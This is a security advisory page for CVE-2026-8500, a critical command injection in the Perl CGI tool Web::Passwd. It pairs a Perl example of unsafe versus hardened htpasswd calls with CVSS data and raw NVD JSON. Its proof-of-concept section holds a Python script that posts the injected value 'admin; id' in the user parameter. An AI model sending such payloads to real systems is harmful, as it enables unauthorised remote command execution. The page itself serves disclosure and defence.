Security Vulnerability Report
CVE-2026-8500 CVSS 9.8 CRITICAL

CVE-2026-8500

Published: 2026-05-13 23:16:43
Last Modified: 2026-05-14 18:16:51
Source: 9b29abf9-4ab0-4765-b253-1875cd9b441e

Description

Web::Passwd versions through 0.03 for Perl are vulnerable to RCE. Web::Passwd is a small CGI application for managing htpasswd files using the htpasswd command. The user parameter is not validated or escaped, and is used as the last argument on the command line, allowing for command injection.
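The flaw described above is the classic CWE-78 shape: a CGI parameter interpolated into a single command string that Perl hands to /bin/sh. The following Perl is an added illustration written for this report, not code from Web::Passwd itself; the htpasswd path, the password-file path and the function names are assumptions. It shows the unsafe one-string call beside a hardened version that allowlists the username and invokes htpasswd with the list form of system(), which execs the binary directly with no shell in between.

```perl
#!/usr/bin/perl
# Added illustration for this report, not Web::Passwd's own code.
use strict;
use warnings;

# Hypothetical paths, not taken from the advisory.
my $HTPASSWD = '/usr/bin/htpasswd';
my $FILE     = '/var/www/.htpasswd';

# Vulnerable shape (do not use): a single string is passed to /bin/sh, so any
# shell metacharacter in $user or $pass is interpreted by the shell rather
# than reaching htpasswd as data. This is the pattern the advisory describes.
sub add_user_unsafe {
    my ($user, $pass) = @_;
    return system("$HTPASSWD -b $FILE $user $pass");
}

# Allowlist for usernames: letters, digits, '_', '.', '-' and at most 64
# characters. The first character deliberately excludes '-' so the value can
# never be parsed by htpasswd as a command-line option, and ':' is excluded
# because it is the field separator inside the htpasswd file itself.
sub valid_username {
    my ($user) = @_;
    return 0 unless defined $user;
    return $user =~ /\A[A-Za-z0-9_.][A-Za-z0-9_.-]{0,63}\z/ ? 1 : 0;
}

# Hardened shape: validate first, then use the list form of system(). Each
# element becomes exactly one argv entry and no shell is involved, so the
# username and password are delivered to htpasswd verbatim.
sub add_user_safe {
    my ($user, $pass) = @_;
    die "invalid username\n" unless valid_username($user);
    die "empty password\n"   unless defined $pass && length $pass;

    # Note: with -b the password appears in the process list while htpasswd
    # runs; htpasswd's stdin mode avoids that but is omitted here for brevity.
    my $rc = system($HTPASSWD, '-b', $FILE, $user, $pass);
    die "htpasswd failed (exit status $?)\n" if $rc != 0;
    return 1;
}

# Small driver so the validator can be exercised from a shell:
#   perl this_script.pl alice
unless (caller) {
    my ($user) = @ARGV;
    print valid_username($user) ? "username accepted\n" : "username rejected\n";
}
```

The validation step matters even with the list form: list-form system() removes the shell, but it does not stop a value that begins with '-' from being interpreted by htpasswd as an option. Rejecting anything outside the allowlist closes both paths at once, and the same check belongs in front of every other place the CGI script reaches for an external command.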

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Web::Passwd <= 0.03

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL of the vulnerable Web::Passwd CGI script
target_url = "http://target/cgi-bin/web-passwd.cgi"

# Malicious payload to execute 'id' command via command injection
# The 'user' parameter is vulnerable to injection
payload = {
    "user": "admin; id",  # Injection payload
    "passwd": "password"
}

try:
    # Send the POST request with the malicious payload
    response = requests.post(target_url, data=payload)

    # Check if the command execution output is present in the response
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response body:")
        print(response.text)
        # Example: Check for 'uid=' which indicates 'id' command output
        if "uid=" in response.text:
            print("[!] Command injection successful!")
        else:
            print("[-] Command injection may have failed or output is hidden.")
    else:
        print(f"[-] Server returned status code: {response.status_code}")
except Exception as e:
    print(f"[!] An error occurred: {e}")

References

https://httpd.apache.org/docs/current/programs/htpasswd.html
https://metacpan.org/release/EVANK/Web-Passwd-0.03
http://www.openwall.com/lists/oss-security/2026/05/13/8

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8500", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2026-05-13T23:16:43.237", "lastModified": "2026-05-14T18:16:51.490", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Web::Passwd versions through 0.03 for Perl is vulnerable to RCE.\n\nWeb::Passwd is a small CGI application for managing htpasswd files using the htpasswd command.\n\nThe user parameter is not validated or escaped, and is used as the last argument on the command line, allowing for command injection."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://httpd.apache.org/docs/current/programs/htpasswd.html", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "https://metacpan.org/release/EVANK/Web-Passwd-0.03", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/13/8", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}